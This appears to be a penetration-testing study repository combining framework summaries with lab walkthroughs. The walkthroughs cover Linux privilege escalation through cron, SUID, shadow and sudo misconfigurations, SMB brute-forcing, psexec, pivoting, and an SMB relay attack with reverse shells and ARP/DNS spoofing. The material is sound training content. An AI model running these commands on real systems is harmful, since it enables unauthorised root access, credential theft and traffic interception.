posture by comparing the current profile with a desired target profile. 26 | The NIST Cybersecurity Framework continues to evolve, with periodic updates to address new cybersecurity challenges and emerging threats. It remains a foundational tool for organizations seeking to build and maintain a robust cybersecurity posture. 27 | 28 | ### 1.2. COBIT (Control Objectives for Information and Related Technologies) 29 | 30 | **COBIT** (Control Objectives for Information and Related Technologies) ([official](https://www.isaca.org/resources/cobit), [wiki](https://en.wikipedia.org/wiki/COBIT)) is a framework developed by ISACA for IT governance and management. It helps organizations align their IT strategy with business goals, manage risks, and ensure that IT investments deliver value. COBIT provides a set of best practices, processes, and tools to guide the effective governance and management of enterprise IT. 31 | Key aspects include: 32 | - **Governance and Management Objectives**: Divided into governance (strategic direction) and management (day-to-day operations). 33 | - **Processes and Principles**: Structured around key processes and principles like meeting stakeholder needs and covering the enterprise end-to-end. 34 | - **Enablers**: Includes processes, organizational structures, culture, information, services, and people that support IT governance. 35 | COBIT is widely used across industries to ensure that IT resources are efficiently and effectively utilized to meet business objectives. 36 | 37 | ## 2. Security standards 38 | 39 | ### 2.1. ISO/IEC 27001 40 | 41 | [ISO/IEC 27001](https://www.iso.org/standard/27001) is an international standard for managing information security through an Information Security Management System (ISMS). It helps organizations protect sensitive data by identifying risks and implementing controls. The standard is widely recognized and can lead to certification, demonstrating an organization's commitment to strong information security practices. 42 | 43 | ### 2.2. PCI Data Security Standard (PCI DSS) 44 | 45 | The [PCI Data Security Standard (PCI DSS)](https://en.wikipedia.org/wiki/Payment_Card_Industry_Data_Security_Standard) is a set of security requirements designed to protect credit card information. It applies to any organization that processes, stores, or transmits credit card data. The standard includes 12 key security requirements, such as maintaining secure networks, protecting cardholder data, and monitoring access to information. Compliance is mandatory for organizations handling credit card transactions to prevent data breaches and ensure secure payment processing. 46 | 47 | ### 2.3. HIPAA (Health Insurance Portability and Accountability Act) 48 | 49 | The [Health Insurance Portability and Accountability Act (HIPAA)](https://en.wikipedia.org/wiki/Health_Insurance_Portability_and_Accountability_Act) is a U.S. law that sets national standards for protecting sensitive patient health information. It requires healthcare providers, insurers, and their business associates to safeguard the privacy and security of individuals' medical records and personal health information. HIPAA ensures that this information is properly protected while allowing the flow of health data necessary to provide high-quality healthcare. Non-compliance can result in significant penalties. 50 | 51 | ### 2.4. GDPR (General Data Protection Regulation) 52 | 53 | The [General Data Protection Regulation (GDPR)](https://gdpr-info.eu/) is an EU law that protects the personal data and privacy of individuals within the EU. It grants individuals more control over their data and requires organizations to follow strict guidelines on data collection, processing, and storage. Non-compliance can lead to heavy fines. The GDPR applies to any organization worldwide that handles the personal data of EU residents. 54 | 55 |
56 | 57 | ## 3. Security Guidelines 58 | 59 | ### 3.1. CIS Controls (Center for Internet Security Controls) 60 | 61 | The [CIS Controls](https://en.wikipedia.org/wiki/The_CIS_Critical_Security_Controls_for_Effective_Cyber_Defense) are a set of best practices for cybersecurity developed by the Center for Internet Security (CIS). They consist of prioritized actions that organizations can implement to protect against common cyber threats. The controls are divided into three categories: basic, foundational, and organizational, covering everything from inventorying assets to managing access control. They are widely used to improve security posture and reduce risk. 62 | 63 | ### 3.2. NIST SP 800-53 64 | 65 | [NIST SP 800-53](https://en.wikipedia.org/wiki/NIST_Special_Publication_800-53) is a publication by the National Institute of Standards and Technology (NIST) that provides a comprehensive set of security and privacy controls for federal information systems and organizations. These controls are designed to protect against various threats and vulnerabilities, ensuring the confidentiality, integrity, and availability of information. It's widely used by federal agencies and organizations to strengthen their cybersecurity posture. 66 | 67 |
68 | 69 | ## 4. Security Auditing with Lynis 70 | 71 | [Lynis](https://cisofy.com/lynis/) is an open-source security auditing tool for Unix-based systems, including Linux, macOS, and BSD. It is designed to assess the security posture of a system by performing a thorough audit, checking for vulnerabilities, configuration issues, and compliance with best practices. 72 | **Key Features of Lynis:** 73 | - **System Auditing**: Lynis performs a deep scan of the system, including files, configurations, and installed software, to identify potential security risks. 74 | - **Vulnerability Detection**: It detects known vulnerabilities and misconfigurations that could be exploited by attackers. 75 | - **Compliance Checking**: Lynis helps organizations check their systems against security standards and regulatory compliance requirements, such as PCI DSS, HIPAA, and ISO/IEC 27001. 76 | - **Logging and Reporting**: After the audit, Lynis provides detailed reports with findings and suggestions for improving system security. 77 | Lynis is widely used by system administrators and security professionals to harden systems and maintain security best practices. 78 | -------------------------------------------------------------------------------- /Cheat-Sheets/Privilege Escalation - Linux.md: -------------------------------------------------------------------------------- 1 | # Exploiting Misconfigured Cron Jobs 2 | 3 | ```shell 4 | # There is a message file in the home directory of student user. Only root user has permissions on this file. So, student user can’t even read it. 5 | ls -l 6 | # Find if a file with the same name exists on the system. 7 | find / -name message 8 | # Observe that a file with the same name is present in the /tmp directory. On checking closely, it is clear that this file is being overwritten every minute. 9 | ls -l /tmp/ 10 | ``` 11 | 12 | This means there is some script/binary which is copying this file from the student home directory to /tmp directory. Search for that script. If this script is doing a simple copy operation, it must have the source destination of the file in it. Try to locate that by using the grep command. On trying on different directories one by one (i.e. /, etc, /opt) and on /usr directory, a match has been found. 13 | 14 | ```shell 15 | grep -nri "/tmp/message" /usr 16 | # `grep`: A command-line tool used to search for specific patterns in files. 17 | # `-n`: Displays the line number in the file where the matching text is found. 18 | # `-r`: Performs a recursive search, meaning it will search through all subdirectories under `/usr`. 19 | # `-i`: Makes the search case-insensitive so it will match `/tmp/message`, `/TMP/MESSAGE`, `/Tmp/Message`, etc. 20 | # `"/tmp/message"`: The search pattern, It looks for any instance of this exact text string. 21 | # `/usr`: The starting directory for the search. The command will look through all files and subfolders within `/usr`. 22 | 23 | # Check the permissions on this script file and its contents. 24 | ls -l /usr/local/share/copy.sh 25 | cat /usr/local/share/copy.sh 26 | ``` 27 | 28 | As the script file is writable by the current student user, it can be modified to execute our commands. This script is executed by root Cron Job, so it can do privileged operations. But, the file can’t be modified directly as there is no text editor on the system. 29 | 30 | ```shell 31 | vim /usr/local/share/copy.sh 32 | vi /usr/local/share/copy.sh 33 | nano /usr/local/share/copy.sh 34 | # command not found 35 | 36 | # Use printf to replace the original code with the following lines. 37 | printf '#! /bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh 38 | 39 | # On execution, these lines will add a new entry to the /etc/sudoers file which will allow the student user to use sudo without providing any password. 40 | 41 | cat /usr/local/share/copy.sh 42 | 43 | # Check the current sudoers list. 44 | sudo -l 45 | 46 | # Switch to the root user using sudo. 47 | sudo su 48 | 49 | # Collect the flag from the root directory. 50 | cd /root 51 | ls -l 52 | cat flag 53 | ``` 54 | 55 |
56 | 57 | # Exploiting SUID Binaries 58 | 59 | Vulnerable setuid on Linux systems could lead to privilege escalation attacks. 60 | 61 | ```shell 62 | ls -l 63 | # We see two binaries there, greeting and welcome. We can also notice the 's' which stands from SUID permission. 64 | # -rwsr-xr-x 1 root root 8344 Sep 22 2018 welcome 65 | ``` 66 | 67 | Observe that the welcome binary has suid bit set (or on). This means that this binary and its child processes will run with root privileges. Check the file type. 68 | 69 | ```shell 70 | file welcome 71 | ./greetings # We don't have the permission for this binary 72 | # But we have for 73 | ./welcome 74 | ``` 75 | 76 | Investigate the binary. The most easy or preliminary way of doing that is to use strings command. 77 | 78 | ```shell 79 | strings welcome 80 | # We can see 'greetings' that it calls upon the greetings binary which is very interesting 81 | ``` 82 | 83 | Observe the greetings strings in the output of the strings command. It is possible that welcome binary is calling greetings binary. So, replace the greetings binary with some other binary (say /bin/bash) which should then also get executed as root. 84 | 85 | ```shell 86 | # Delete greetings binary and then copy /bin/bash to its location and rename that to greetings. 87 | rm greetings 88 | cp /bin/bash greetings 89 | ls 90 | 91 | # Then, run the welcome binary again. 92 | ./welcome # Execute the bash with root privileges 93 | id 94 | whoami 95 | ``` 96 | 97 | Student user got escalate to root user. Retrieve the flag kept in /root directory. 98 | 99 | ```shell 100 | ls 101 | cat flag 102 | ``` 103 | 104 |
105 | 106 | # Exploiting SUID Binaries 107 | 108 | ```shell 109 | # Check the permissions each shell has 110 | cat /etc/shells | while read shell; do ls -l $shell 2>/dev/null; done 111 | # Loops through all valid shell paths listed in /etc/shells and displays their permissions if they exist. 112 | # Useful for checking which shells are present and executable on the system. 113 | # We can use any shell with the permission lrwxrwxrwx for escalation. 114 | 115 | # Check for executables with the SetUID bit set that can run with root privileges 116 | find / -perm -4000 2>/dev/null 117 | ``` 118 | 119 | When conducting privilege escalation, identifying SetUID (Set User ID) binaries is critical, as they allow executables to run with the permissions of their owner — often root. 120 | 121 | ```shell 122 | # We can spawn a new shell with root privileges 123 | find / -exec /bin/rbash -p \; -quit 124 | # Executes /bin/rbash with the -p option from the first file found by 'find', then quits. 125 | # '-p' preserves the environment — potentially bypassing restricted shell protections. 126 | # Useful in privilege escalation or shell escape scenarios. 127 | ``` 128 | 129 |
130 | 131 | # Rootkit Scanner 132 | 133 | ```shell 134 | # To identify the vulnerable program or service, we can list all running processes on the system using the following command: 135 | ps aux # Check for any scripts running that are running chkrootkit as root 136 | # Observe, that there are a couple of processes running i.e. cron and one bash script. 137 | # Investigate the check-down bash script. 138 | cat /bin/check-down 139 | # The chkrootkit rootkit scanner is running as root every 60 seconds. Check the chkrootkit location and its version. 140 | command -v chkrootkit 141 | /bin/chkrootkit -V 142 | # We found the chkrootkit binary location and its version. Searching privilege escalation exploit module for chkrootkit 0.49. 143 | 144 | searchsploit chkrootkit 0.49 145 | 146 | use exploit/unix/local/chkrootkit 147 | set CHKROOTKIT /bin/chkrootkit 148 | set SESSION 149 | set LHOST 150 | exploit 151 | 152 | cat /root/flag 153 | ``` 154 | 155 |
156 | 157 | # Linux Privilege Escalation - Permissions Matter! 158 | 159 | ```shell 160 | # This command searches the entire filesystem (/) for files or directories that are not symbolic links (-not -type l) and are world-writable (-perm -o+w). It helps identify potentially insecure files that anyone on the system can write to, which can be a security risk. 161 | find / -not -type l -perm -o+w 162 | 163 | # Observe from the result that /etc/shadow is world writable. Verify the same and also check its contents. 164 | ls -l /etc/shadow 165 | cat /etc/shadow 166 | 167 | # Observe that the root password is not set. Adding a known password in the shadow file can escalate to root. Use openssl to generate a password entry. - root:*:... - 168 | openssl passwd -1 -salt abc password 169 | 170 | # Copy the generated entry and add it to the root record in /etc/shadow 171 | vim /etc/shadow 172 | 173 | 174 | # After making the changes, try to switch to the root user. 175 | su 176 | 177 | # Once the escalation to root is complete, retrieve the flag located in /root directory. 178 | cd /root 179 | ls -l 180 | cat flag 181 | ``` 182 | 183 | **Note**: `sudo su` works only if the current user has `sudo` privileges, allowing them to become root directly. If the user is low-privileged and not in the sudoers group, `sudo su` won’t work, and privilege escalation must be done another way. One method is injecting a known password hash into `/etc/shadow`, which allows logging in as root using `su` and that password, even without `sudo` access. 184 | 185 |
186 | 187 | # Linux Privilege Escalation - SUDO Privileges 188 | 189 | We are now trying to escalate privileges to get root. After some digging around and from other sources, we figured out that the same person in the organization uses both the student account and the root account on the system. 190 | 191 | ```shell 192 | find / -user root -perm -4000 -exec ls -ldb {} \; 193 | # Searches the entire filesystem (/) for files that are owned by root and have the SUID (Set User ID) bit set — represented by 4000. The SUID permission allows a file to be executed with the privileges of its owner (in this case, root), which can be exploited for privilege escalation if the file is vulnerable. The -exec ls -ldb {} part lists each found file with detailed permissions and ownership info. 194 | 195 | # No anomaly is there. Move on to finding misconfigured sudo. Check the current sudo capabilities. Check if we can run sudo without a password 196 | sudo -l 197 | 198 | # The man entry depicts that the man command can be run using sudo without providing any password. Run it and launch /bin/bash from it 199 | # We got (root) NOPASSWD: /usr/bin/man 200 | # This means the user student is allowed to run the man command as root without needing a password using sudo. 201 | sudo man ls 202 | # Once inside the manual page: 203 | !/bin/bash 204 | # You now have a root shell 205 | cd /root 206 | ls -l 207 | cat flag 208 | ``` 209 | -------------------------------------------------------------------------------- /Course-Notes/01. Information Gathering.md: -------------------------------------------------------------------------------- 1 | # Information Gathering 2 | 3 |
4 | 5 | ## 1. Introduction 6 | 7 | **Information gathering** is the first step of any penetration test and is arguably the most important as all other phases rely on the information obtained about the target during the information gathering phase. 8 | Information gathering is typically broken down into **two types**: 9 | 10 | **1) Passive Information Gathering** 11 | Focuses on collecting data without direct interaction with the target, making it stealthy but sometimes less detailed, some examples below. 12 | - Identifying IP addresses & DNS information 13 | - Domain names and domain ownership information 14 | - Email addresses and social media profiles 15 | - Web technologies being used on target sites 16 | - Identifying subdomains 17 | 18 | **2) Active Information Gathering** 19 | Involves gathering as much information as possible by actively engaging with the target system, providing more detailed information but with a higher risk of detection. For example: 20 | - Discovering open ports on target systems 21 | - Learning about the internal infrastructure of a target, network or organization 22 | - Enumerating information from target systems 23 | 24 |
25 | 26 | ## 2. Passive Tools - Information Gathering 27 | 28 | ### 2.1. Host Command 29 | 30 | The host command in Linux is a simple utility for performing DNS lookups. It can be used to find the IP address of a domain, perform reverse DNS lookups, query specific DNS record types, and more. 31 | 32 | ```shell 33 | # Displays the manual (man) page for the host command 34 | man host 35 | ``` 36 | 37 | ### 2.2. robots.txt 38 | 39 | Is a text file webmasters create to instruct web robots (typically search engine robots) how to crawl pages on their website. The file is part of the Robots Exclusion Protocol (REP), a group of web standards that regulate how robots crawl the web, access and index content, and serve that content up to users. The *robots.txt* file is placed in the root directory of the website and is publicly accessible by appending */robots.txt* to the end of a domain name. To check if a site has a robots.txt file, you can try navigating to "*/robots.txt*". For more info, check the [Wiki page](https://en.wikipedia.org/wiki/Robots.txt). 40 | 41 | ### 2.3. HTTrack 42 | 43 | It allows users to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer, the proxy might not allow that. 44 | For more info, check [HTTrack website](https://www.httrack.com/). 45 | 46 | ### 2.4. Sublist3r 47 | 48 | Is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. 49 | The GitHub page is [Sublist3r](https://github.com/aboul3la/Sublist3r). 50 | 51 | ### 2.5. Google Dorks 52 | 53 | Is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using. Google Dorking is done directly within a web browser by entering specially crafted search queries into the Google search bar. Some useful resources are: 54 | - [Google dork cheatsheet](https://gist.github.com/sundowndev/283efaddbcf896ab405488330d1bbc06) 55 | - [Exploit Database](https://www.exploit-db.com/google-hacking-database). 56 | 57 | ### 2.6. theHarvester 58 | 59 | [theHarvester](https://github.com/laramies/theHarvester) is a tool designed to gather emails, names, subdomains, IPs, and URLs using multiple public sources like search engines and social networks. 60 | 61 | ### 2.7. have i been pwned? 62 | 63 | [have i been pwned?](https://haveibeenpwned.com/) is a free online service created by cybersecurity expert Troy Hunt. The website allows users to check if their personal data, such as email addresses or phone numbers, have been compromised in known data breaches. The term "pwned" is internet slang for "owned" or "compromised". 64 | 65 |
66 | 67 | ## 3. Active Tools - Information Gathering 68 | 69 | ### 3.1. NMAP 70 | 71 | Is an open-source tool ([Nmap website](https://nmap.org/)) widely used in network security for discovering hosts and services on a computer network. It is one of the most popular tools in cybersecurity, employed by network administrators, security professionals, and hackers alike to perform network discovery and security auditing. The main key features of Nmap are: 72 | - Host Discovery 73 | - Port Scanning 74 | - Service and Version Detection 75 | - Operating System Detection 76 | - Scripting Engine (NSE) 77 | - Vulnerability Scanning 78 | - Network Inventory 79 | - Firewall and Intrusion Detection Evasion 80 | 81 | ### 3.2. Metasploit 82 | 83 | [Metasploit](https://www.metasploit.com/) is a powerful open-source framework used for penetration testing, vulnerability assessment, and exploitation development. Developed by Rapid7, it allows security professionals and ethical hackers to identify, exploit, and validate vulnerabilities in systems and applications. It's widely used to test the security posture of networks by simulating real-world attacks. 84 | Here are the key aspects of Metasploit: 85 | - **Penetration Testing**: Metasploit helps security professionals simulate attacks against their systems. It automates the process of discovering vulnerabilities and launching exploits, which gives security teams a better understanding of how vulnerable their systems are. 86 | - **Exploit Database**: The framework contains a vast and frequently updated exploit repository, which includes thousands of known exploits for various vulnerabilities across different platforms and applications. These exploits can be used to target systems and applications that have not been patched or secured properly. 87 | - **Payloads**: A payload is the code that gets executed on a target system after a successful exploit. Metasploit allows users to choose from different payloads, such as opening a reverse shell, creating a backdoor, or gaining remote control of a system. 88 | - **Post-Exploitation**: Once an exploit is successful, Metasploit enables users to perform various post-exploitation tasks, such as data extraction, privilege escalation, or further lateral movement within a compromised network. 89 | - **Metasploit Modules**: Metasploit is highly modular, with different types of modules: 90 | - *Exploit Modules*: Used to target vulnerabilities and launch attacks. 91 | - *Payload Modules*: Define what happens after an exploit, such as opening a shell or installing malware. 92 | - *Auxiliary Modules*: Non-exploit functions like scanning, fuzzing, or enumeration. 93 | - *Post-Exploitation Modules*: Used after gaining access, to perform tasks like password dumping or network pivoting. 94 | - **Armitage**: [Armitage](https://en.wikipedia.org/wiki/Armitage_(computing)) is a graphical front-end for Metasploit, which makes it easier to use for users who prefer GUI over the command line. 95 | - **Metasploit Console (*msfconsole*)**: The primary interface for Metasploit is its command-line console, which provides a powerful environment to interact with and configure exploits, payloads, and auxiliary functions. 96 | 97 | ### 3.3. DirBuster 98 | 99 | **DirBuster** is a directory and file brute-forcing tool used by security professionals and penetration testers to discover hidden directories and files on web servers. It helps uncover web content that is not directly linked on websites, such as unlisted directories, sensitive files, or unprotected resources, which might contain vulnerabilities or sensitive information. 100 | Despite its popularity, DirBuster is not updated as frequently anymore, and users often use newer tools like **Gobuster** or **ffuf** for similar functionality. 101 | 102 | ### 3.4. Nikto 103 | 104 | **Nikto** is an open-source web server scanner designed to identify potential security vulnerabilities in web servers. It performs comprehensive tests against web servers, checking for outdated software versions, vulnerable services, and misconfigurations. 105 | Nikto is widely used in penetration testing and vulnerability assessment to enhance web application security, though it may generate false positives and lacks stealth, meaning it can easily be detected by security systems. 106 | 107 | ### 3.5. WPScan 108 | 109 | **WPScan** is a specialized security tool designed to scan WordPress websites for potential vulnerabilities. It focuses on identifying weaknesses and misconfigurations in WordPress core files, themes, and plugins. WPScan is widely used in penetration testing, vulnerability assessments, and security monitoring for WordPress installations. 110 | 111 | ### 3.6. CrackMapExec 112 | 113 | **CrackMapExec (CME)** is a powerful post-exploitation and penetration testing tool designed for assessing large networks, especially in Active Directory (AD) environments. It's commonly used by security professionals, red teams, and penetration testers for lateral movement, credential validation, and system enumeration. CME is known for its versatility in targeting and interacting with Windows networks and systems, making it a favorite for auditing Active Directory infrastructures. 114 | 115 | ### 3.7. Searchsploit 116 | 117 | SearchSploit is a command-line utility that comes with the Exploit-DB repository, allowing users to search for known exploits and vulnerability information in offline mode. It is part of the "Exploit Database" maintained by Offensive Security and provides access to a large archive of publicly disclosed vulnerabilities, exploit code, and proof-of-concept (PoC) scripts. 118 | 119 | ### 3.8. Hydra 120 | 121 | **Hydra** (also known as THC-Hydra) is a popular and powerful password-cracking tool designed for brute force and dictionary attacks on various network protocols and services. It is used by security professionals, penetration testers, and hackers to identify weak passwords in systems by trying different username and password combinations. 122 | -------------------------------------------------------------------------------- /Course-Notes/07. Network-Based Attacks.md: -------------------------------------------------------------------------------- 1 | # Network-Based Attacks 2 | 3 |
4 | 5 | ## 1. Networking 6 | 7 | ### 1.1. Firewall Detection & IDS Evasion 8 | 9 | The object of this section is going to revolve around how you can use Nmap to detect the presence of a host based firewall, or the presence of a filtering mechanism. Improve Nmap scan in order to detect a firewall and evade it. 10 | 11 | **Detect Firewalls** 12 | 13 | ```shell 14 | nmap -sA # ACK scan to detect firewall presence 15 | nmap -Pn -sS -F # Stealth SYN scan on common ports 16 | nmap -Pn -sS -F -p 445,3389 # Target specific ports 17 | # Check Port Status: Look for filtered or unfiltered results. 18 | ``` 19 | 20 | **Evade Firewalls** 21 | 22 | ```shell 23 | nmap -Pn -sS -sV -F -f -p 80,445,3389 # Fragment packets 24 | nmap -Pn -sS -sV -F -f --mtu 32 # Manipulate packet size 25 | ``` 26 | 27 | **IP Spoofing and Decoy** 28 | - IP Spoofing is a technique where an attacker falsifies the source IP address in packet headers to make it appear as if the traffic is coming from another machine. 29 | - Decoy scanning is an Nmap feature that sends packets from multiple fake IP addresses along with your real IP. This confuses intrusion detection systems (IDS) and firewalls, making it difficult for the target to identify the real attacker. 30 | 31 | ```shell 32 | nmap -Pn -sS -sV -p 445,3389 -f --data-length 200 -D , # Use decoys 33 | nmap -Pn -sS -sV -p 445,3389 -f --data-length 200 -g 53 -D , # Spoof port 53 34 | ``` 35 | 36 |
37 | 38 | ## 2. Networks Attacks 39 | 40 | ### 2.1. SMB & NetBIOS Enumeration 41 | 42 | You will learn to enumerate the SMB service and exploit it using different brute-forcing and exploitation tools. Also, it covers pivoting and how to leverage net utility to mount the shared drives in the pivot network. 43 | 44 | **Objective:** Exploit both the target and find the flag! 45 | 46 | ```shell 47 | cat /etc/hosts 48 | ping -c 1 49 | ping -c 1 # Not reachable 50 | nmap -sV -O 51 | # By default, the SMB service uses either IP port 139 or 445. 52 | ``` 53 | 54 | All the ports expose core services of the Windows operating system, i.e., SMB, RDP, RPC, etc. In this section, we will perform attacks on the SMB service. 55 | 56 | ```shell 57 | nmap -sV -p 139,445 58 | ls /usr/share/nmap/scripts/ | grep smb 59 | 60 | # Now, let's identify all the supported SMB versions on the target machine. 61 | nmap -p 445 --script smb-protocols 62 | # We can notice that all three versions are accessible. 63 | 64 | # Let's run the nmap script to find the smb protocol security level. 65 | nmap -p 445 --script smb-security-mode 66 | 67 | # Let's run the smbclient tool to find that we have anonymous access on the target machine. 68 | smbclient -L 69 | # We can access the target using anonymous login. 70 | ``` 71 | 72 | We can access the target using anonymous login. Now, we have anonymous access to the target machine. We can smoothly dump all the present windows users using the nmap script. 73 | 74 | ```shell 75 | nmap -p445 --script smb-enum-users.nse 76 | # There are a total of four users present. admin, administrator, root, and guest. 77 | 78 | # Now, let's find the valid password for admin, administrator, and root user. 79 | vim users.txt 80 | admin 81 | administrator 82 | root 83 | ``` 84 | 85 | Now, let's run the hydra tool for brute-forcing the SMB protocol to find the valid password of the provided users. 86 | 87 | ```shell 88 | hydra 89 | -L 90 | users.txt 91 | -P 92 | /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 93 | 94 | smb 95 | ``` 96 | 97 | Now, we can use the Metasploit framework and run the psexec exploit module to gain the meterpreter shell using the administrator user valid password. 98 | 99 | ```shell 100 | msfconsole -q 101 | use exploit/windows/smb/psexec 102 | set RHOSTS 103 | set SMBUser 104 | set SMBPass 105 | exploit 106 | 107 | getuid 108 | sysinfo 109 | 110 | shell 111 | dir C:\ /s /b | findstr /i flag 112 | # Searches for files and folders containing the word "flag" (case-insensitive) anywhere in their name across the entire C:\ drive. 113 | 114 | # Now, let's ping to the second target and verify that it is reachable from the second machine. 115 | ``` 116 | 117 | Here we need to perform pivoting by adding route from the Metasploit framework. 118 | Let's add the route using the meterpreter session and identify the second machine service. 119 | 120 | ```shell 121 | run autoroute -s 122 | # This command is used in the Meterpreter session within the Metasploit Framework. It sets up a route through a compromised machine to access other networks that are not directly reachable from the attacker's machine. 123 | 124 | # We have successfully added the route to access the demo1.ine.local machine. 125 | ``` 126 | 127 | Now, let's start the socks proxy server to access the pivot system on the attacker's machine using the proxychains tool. 128 | First start the socks server using the Metasploit module. 129 | 130 | ```shell 131 | background 132 | use auxiliary/server/socks_proxy 133 | show options 134 | set SRVPORT 9050 135 | set VERSION 4a 136 | exploit 137 | jobs 138 | ``` 139 | 140 | Now, let's run nmap with proxychains to identify SMB port (445) on the pivot machine. We could also specify multiple ports. But, in this case, we are only interested in SMB service. 141 | 142 | ```shell 143 | proxychains nmap -sT -Pn -sV -p 445 144 | ``` 145 | 146 | Now, let's use the net view command to find all resources shared by the machine. 147 | 148 | ```shell 149 | # Interact with the meterpreter session again. 150 | sessions -i 1 151 | 152 | pgrep explorer 153 | migrate 154 | 155 | shell 156 | net view 157 | ``` 158 | 159 | We can see two shared resources. **Documents** and **K** drive. This confirms that pivot target allows Null Sessions, so we can access the shared resources. Also, we can achieve the same goal in several ways. 160 | 161 | ```shell 162 | net use D: \\\Documents 163 | net use K: \\\K$ 164 | 165 | # We successfully mapped the resources to D and K drives. Let's check what is inside these mapped drives. 166 | dir D: 167 | dir K: 168 | 169 | cd D:\\ 170 | download Confidentia.txt 171 | download FLAG2.txt 172 | ``` 173 | 174 | ### 2.2. SNMP Analysis 175 | 176 | SNMP (Simple Network Management Protocol) is a network protocol used for monitoring, managing, and configuring devices like routers, switches, servers, and printers over IP networks. It enables network administrators to collect information, detect faults, and configure network devices remotely through a management system. 177 | 178 | **Objective**: Exploit the target to gain the shell and find the flag! 179 | The best tools for this goal are: 180 | - Nmap 181 | - Metasploit Framework 182 | - snmpwalk 183 | - Hydra 184 | 185 | **Scan the target** 186 | 187 | ```shell 188 | nmap -Pn -sV 189 | nmap -sU -p 161 190 | ``` 191 | 192 | We can notice, multiple ports are open on the target machine. Now, let's check if the SNMP port is open or not. As we can see, the UDP port 161 is open. This information is crucial for our following tasks. 193 | 194 | ```shell 195 | ls /usr/share/nmap/scripts/ | grep snmp 196 | ls -al /usr/share/nmap/scripts/ | grep snmp # -al > All files | Long listing format 197 | 198 | nmap -sU -p 161 --script snmp-brute 199 | # As we can see, we found three community names: public, private, and secret 200 | 201 | nmap -sU -p 161 --script snmp-win32-users 202 | # Attempts to enumerate Windows user accounts through SNMP 203 | # snmp-win32-users: Administrator, DefaultAccount, Guest, WDAGUtilityAccount, admin 204 | 205 | nmap -sU -p 161 --script snmp-* > snmp_output 206 | # The above command would run all the nmap SNMP scripts on the target machine and store its output to the snmp_output file. 207 | ``` 208 | 209 | Now, let's run a brute-force attack using these windows users on SMB service. Port 445 is open, and we can run a brute-force attack using the hydra tool. 210 | 211 | ```shell 212 | hydra 213 | -l 214 | -P /usr/share /metasploit-framewords/data/wordlists/unix_passwords.txt 215 | smb 216 | # We can now authenticate via psexec or we can use the metasploit module. 217 | 218 | msfconsole -q 219 | search smb psexec 220 | use exploit/windows/smb/psexec 221 | set RHOSTS, SMBUSER, SMBPASS 222 | exploit 223 | 224 | # meterpreter 225 | cd C:/ 226 | cat FLAG1.txt 227 | ``` 228 | 229 | ### 2.3. SMB Relay Attack 230 | 231 | The assumptions of this security engagement are: 232 | - You are going to do an internal penetration test, where you will be connected directly into their LAN network 172.16.5.0/24. The scope in this test is only the 172.16.5.0/24 segment. 233 | - You are in a production network, so you should not lock any user account by guessing their usernames and passwords. 234 | 235 | **Goals**: 236 | - Exploitation using SMB Relay Attack 237 | - Manipulating network traffic with dnsspoof 238 | 239 | ![[Pasted image 20250223160924.png]] 240 | 241 | Launch an attack using the SMB Relay Exploit in a way that once the Client (172.16.5.5) issues a SMB connection to any hosts on the .sportsfoo.com domain it can be redirected to your Metasploit server, and then you can use its credentials to get a shell on the target machine (172.16.5.10). 242 | 243 | **Step 1:** Start **msfconsole** and configure the SMB Relay exploit: **Commands:** 244 | 245 | ```shell 246 | service postgresql start && msfconsole 247 | search smb_relay 248 | use exploit/windows/smb/smb_relay 249 | show options 250 | set SRVHOST 172.16.5.101 251 | set PAYLOAD windows/meterpreter/reverse_tcp 252 | set LHOST 172.16.5.101 253 | set SMBHOST 172.16.5.10 254 | exploit 255 | ``` 256 | 257 | **Step 2:** Configure dnsspoof 258 | 259 | ```shell 260 | # In order to redirect the victim to our Metasploit system every time there's an SMB connection to any host in the domain, create a file with fake dns entry with all subdomains of sportsfoo.com pointing to our attacker machine. 261 | 262 | echo "172.16.5.101 *.sportsfoo.com" > dns 263 | # We are ready to run. 264 | dnsspoof -i eth1 -f dns 265 | 266 | # How move on to setting up the man in the middle attack and we'll utilize arp spoofing and our goal is to poison the traffic between our victim which is the Windows 7 system and the default gateway. 267 | echo 1 > /proc/sys/net/ipv4/ip_forward 268 | # In one terminal 269 | arpspoof -i eth1 -t -r # without -r 270 | 271 | # In another terminal 272 | arpspoof -i eth1 -t -r 273 | 274 | # Every time the victim system or the wiondows 7 starts on SMB connection DNS spoof aligned with the arp spoofing attack forgets the DNS replies telling that the DNS address that they're looking for resolves to the Kali Linux system. 275 | exploit # metasploit 276 | jobs 277 | 278 | sessions 279 | getuid 280 | ``` 281 | -------------------------------------------------------------------------------- /Cheat-Sheets/HTTP.md: -------------------------------------------------------------------------------- 1 | 2 | # HTTP 3 | 4 | **HTTP (Hypertext Transfer Protocol)** 5 | **Description**: HTTP (Hypertext Transfer Protocol) is used for serving web content 6 | **Ports**: TCP 80 (HTTP), TCP 443 (HTTPS) 7 | **Known Vulnerabilities**: Directory traversal, RCE via web apps (PHP, CGI, Apache modules), WebDAV misconfigs, Vulnerable CMS (e.g., ProcessMaker), Shellshock, PHP CGI injection, Auth bypasses 8 | 9 |
10 | 11 | # Basic HTTP - Enumeration 12 | 13 | ```shell 14 | curl http:// 15 | # Sends a basic HTTP request and displays the response (usually the homepage). 16 | 17 | curl -I http:// 18 | # Fetch HTTP headers only. 19 | 20 | curl -u : http:///secure/ 21 | # Sends a request with basic HTTP authentication using the provided username and password. 22 | 23 | curl -X OPTIONS http:// -i 24 | # Check allowed HTTP methods (OPTIONS, PUT, DELETE, etc.). 25 | 26 | curl -X POST -d 'username=admin&password=admin' http:///login.php 27 | # Sends a POST request with login data. 28 | 29 | curl -X PUT -d "Test Upload" http:///uploads/test.txt 30 | # Uploads data using HTTP PUT to a specific file path. 31 | 32 | dirb 33 | # Brute-force discover directories on the target. 34 | 35 | dirb -w /usr/share/dirb/wordlists/big.txt -X .bak,.tar.gz,.zip,.sql,.bak.zip 36 | gobuster dir -u http:// -w /usr/share/wordlists/dirb/common.txt -x php 37 | # Find backup and archive files by brute-forcing extensions. 38 | 39 | ffuf -u http:///FUZZ -w 40 | # Fast fuzzing for directories and files. 41 | 42 | gobuster dir -u http:// -w 43 | # Scan for directories using a wordlist. 44 | 45 | httrack -O target_site.html 46 | # Mirrors the full website to your machine. 47 | 48 | nc 80 49 | # Opens a raw TCP 